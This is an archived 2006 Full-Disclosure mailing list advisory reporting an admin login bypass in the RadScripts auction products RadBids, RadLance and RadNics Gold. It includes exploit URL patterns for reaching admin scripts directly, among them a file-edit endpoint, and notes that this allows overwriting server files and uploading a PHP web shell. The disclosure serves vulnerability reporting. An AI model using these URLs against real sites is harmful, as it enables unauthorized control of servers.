lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003701c6aeef$81f6cdd0$fac995c3@element>
Date: Mon, 24 Jul 2006 14:03:34 +0700
From: "Duke" <vuln.invent@...il.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: RadBids Gold, RadLance Gold,
	RadNics Gold auction products: Admin bypass vulnerability

Products: RadBids Gold, RadLance Gold, RadNics Gold auction products

Vendor: RadScripts

URL: http://www.radscripts.com/

VULNERABILITY CLASS: Admin login bypass

[Product Description]

RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php 

auction software is simple to deploy and easy to manage. From a web-based aministrative panel one can manage all aspects of 

the auction software including categories, users, financial transactions and every aspect of the auction software with a few 

clicks of the mouse. 

[Summary]

An attacker can exploit RadScripts Auction Software admin login by entering the direct URL to admin scripts.

[Exploit]

http://target.xxx/[product_home]/admin/a_[admin_action_file]

For example:
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]

This can be used overwrite any file on server which has write permissions on it. 
For example upload own php web-shell.

[Credits]

INVENT
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ